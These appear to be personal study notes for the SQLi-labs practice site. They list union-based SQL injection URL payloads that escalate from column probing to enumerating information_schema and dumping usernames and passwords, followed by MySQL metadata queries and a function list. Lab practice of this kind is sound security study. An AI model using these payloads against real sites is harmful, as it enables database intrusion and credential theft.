(https://resources.infosecinstitute.com/tutorial-on-sqli-labs/#gref)
https://dev.mysql.com/doc/refman/8.0/en/columns-table.html
https://www.techonthenet.com/mysql/functions/index.php

SQL Dumps
http://lab.in/sqli/Less-1/?id=-2 union select 1,2,3 -- -
http://lab.in/sqli/Less-2/?id=-1 union select 1,2,3 -- -
http://lab.in/sqli/Less-3/?id=-1') union select 1,2,3 -- -

http://lab.in/sqli/Less-4/?id=-1") union select 1,2,3 -- -
http://lab.in/sqli/Less-4/?id=-2") union select 1,table_name,3 from information_schema.tables where table_schema='security' -- -
----(Fetch Table's Names)----------
http://lab.in/sqli/Less-4/?id=-2") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- -
----(Fetch Table's Column Names)----------
http://lab.in/sqli/Less-4/?id=-2') union select 1,group_concat(table_name),group_concat(column_name) from information_schema.columns where table_schema="security" -- +
----(Fetch Column's of Table Field DATA)----------
http://lab.in/sqli/Less-4/?id=-2") union select 1,group_concat(username),group_concat(password) from users -- +



version() database() user() current_user 
***************************************************************
show databases;
use information_schema;
show tables;
desc tables;
select count(*) from information_schema.tables ;
select count(*) from information_schema.columns ;
# select table_name from information_schema,tables where table_schema='security';
# select table_name,column_name from information_schema.tables where table_schema="security";
# select table_name,column_name from information_schema.columns where table_schema="security";

select * from information_schema.columns limit 0,5;
********************************************************************************************************************
((The list of MySQL functions, sorted by category ))
===== String Functions =====
ASCII CHAR_LENGTH CHARACTER_LENGTH CONCAT CONCAT_WS FIELD FIND_IN_SET FORMAT INSERT INSTR LCASE 
LEFT LENGTH LOCATE LOWER LPAD LTRIM MID POSITION REPEAT REPLACE REVERSE 
RIGHT RPAD RTRIM SPACE STRCMP SUBSTR SUBSTRING SUBSTRING_INDEX TRIM UCASE UPPER 
===== Numeric/Math Functions ===== 
ABS ACOS ASIN ATAN ATAN2 AVG CEIL CEILING COS COT COUNT DEGREES 
DIV EXP FLOOR GREATEST LEAST LN LOG LOG10 LOG2 MAX MIN MOD 
PI POW POWER RADIANS RAND ROUND SIGN SIN SQRT SUM TAN TRUNCATE 
===== Date/Time Functions ===== 
ADDDATE ADDTIME CURDATE CURRENT_DATE CURRENT_TIME CURRENT_TIMESTAMP CURTIME DATE DATE_ADD DATE_FORMAT DATE_SUB DATEDIFF DAY DAYNAME DAYOFMONTH DAYOFWEEK DAYOFYEAR 
EXTRACT FROM_DAYS HOUR LAST_DAY LOCALTIME LOCALTIMESTAMP MAKEDATE MAKETIME MICROSECOND MINUTE MONTH MONTHNAME NOW PERIOD_ADD PERIOD_DIFF QUARTER SEC_TO_TIME 
SECOND STR_TO_DATE SUBDATE SUBTIME SYSDATE TIME TIME_FORMAT TIME_TO_SEC TIMEDIFF TIMESTAMP TO_DAYS WEEK WEEKDAY WEEKOFYEAR YEAR YEARWEEK 
===== Advanced Functions ===== 
BIN BINARY CASE CAST COALESCE CONNECTION_ID CONV 
CONVERT CURRENT_USER DATABASE IF IFNULL ISNULL LAST_INSERT_ID 
NULLIF SESSION_USER SYSTEM_USER USER VERSION 
===== Encryption Functions ===== 
ENCRYPT MD5 OLD_PASSWORD PASSWORD
